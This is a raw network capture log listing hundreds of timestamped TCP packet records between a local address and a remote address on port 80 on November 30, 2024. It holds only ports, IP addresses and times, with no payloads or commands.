                                                                                                                  Nov 30, 2024 01:55:25.412947893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.412992001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.413146973 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.413193941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.414079905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.414123058 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.414238930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.414274931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.415227890 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.415401936 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.415452957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.416379929 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.416538000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.416584969 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.417527914 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.417570114 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.417680979 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.418404102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.418697119 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.418744087 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.418858051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.418895960 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.419843912 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.419888020 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.419995070 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.420036077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.420978069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.421020031 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.421135902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.421178102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.422136068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.422187090 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.422280073 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.422400951 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.423300982 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.423350096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.423460007 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.423502922 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.424448013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.424499989 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.424792051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.425617933 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.425668001 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.425741911 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.426403046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.426742077 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.426897049 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.426944017 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.427886963 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.428046942 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.428095102 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.429033995 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.429076910 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.429167986 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.430185080 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.430231094 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.430340052 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.430397034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.431323051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.431483030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.431528091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.432482958 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.432635069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.432677031 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.433602095 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.433645010 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.433763027 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.434405088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.434776068 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.435039043 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.435082912 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.435925007 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.436078072 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.436121941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.437073946 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.437117100 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.437222004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.437711954 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.438221931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.438265085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.438353062 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.438397884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.439364910 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.439527988 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.439572096 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.440501928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.440670013 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.440716982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.441651106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.441690922 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.441807985 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.442397118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.442807913 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.442955017 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.442994118 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.443948030 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.444117069 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.444158077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.445099115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.445146084 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.445266962 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.446295023 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.446341991 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.446418047 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.447417021 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.447459936 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.447552919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.447591066 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.448534966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.448694944 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.448733091 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.449702978 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.449878931 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.449918985 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.450858116 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.450997114 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.451040983 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.451994896 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.452167034 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.452227116 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.453140974 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.453190088 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.453315020 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.454288006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.454332113 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.454418898 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.455151081 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.455477953 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.455638885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.455687046 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.456641912 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.456804991 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.456856012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.457748890 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.457912922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.457963943 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.458895922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.459064960 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.459114075 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.460053921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.460222006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.460273981 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.461210966 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.461380005 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.461430073 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.462362051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.462404966 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.462486029 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.463481903 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.463534117 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.463608027 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.463767052 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.464617014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.464675903 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.605650902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.605662107 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.605926037 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.605962992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.606076956 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.606127977 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.606386900 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.607110977 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.607153893 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.607217073 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.607258081 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.608254910 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.608303070 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.608376026 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.608417034 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.609389067 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.609457970 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.609488964 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.610413074 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.610549927 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.610594988 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.610667944 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.610707045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.611706972 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.611747980 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.611831903 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.611870050 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.612860918 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.612905025 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.612981081 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.613019943 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.613995075 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.614037037 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.614106894 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.614145994 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.615144014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.615264893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.615317106 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.616324902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.616460085 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.616503000 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.617441893 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.617486000 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.617544889 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.617703915 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.618603945 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.618648052 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.618731022 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.618771076 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.619760990 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.619807005 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.619872093 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.619911909 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.620904922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.620951891 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.621098042 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.621144056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.622045040 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.622088909 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.622158051 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.622199059 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.623188972 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.623234987 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.623294115 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.623337030 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.624344110 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.624389887 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.624553919 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.624599934 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.625487089 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.625534058 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.625607014 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.625650883 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.626643896 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.626704931 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.626749992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.626795053 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.627790928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.627836943 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.627899885 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.627942085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.628938913 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.628985882 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.629074097 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.629115105 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.630089045 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.630136967 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.630194902 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.630238056 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.631237984 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.631283045 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.631350994 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.631397009 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.632386923 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.632428885 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.632504940 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.632545948 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.633539915 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.633584023 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.633644104 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.633690119 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.634691000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.634737015 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.634794950 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.634838104 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.635838985 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.635884047 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.635946989 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.635987997 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.636976004 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.637041092 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.637100935 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.637144089 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.638144970 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.638189077 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.638268948 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.638309956 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.639272928 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.639327049 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.639401913 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.639442921 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.640419960 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.640542030 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.640544891 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.640585899 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.641566992 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.641613007 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.641674042 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.641716957 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.642731905 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.642776012 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.642849922 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.642891884 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.643892050 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.643934011 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.644007921 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.644052982 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.645024061 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.645066977 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.645143032 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.645180941 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.646173000 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.646217108 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.646262884 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.646301031 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.647336006 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.647393942 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.647425890 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.647461891 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.648478031 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.648518085 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.648613930 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.648655891 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.649609089 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.649653912 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.649727106 CET8049740185.215.113.84192.168.2.4
                                                                                                                  Nov 30, 2024 01:55:25.649770021 CET4974080192.168.2.4185.215.113.84
                                                                                                                  Nov 30, 2024 01:55:25.650763035 CET8049740185.215.113.84192.168.2.4
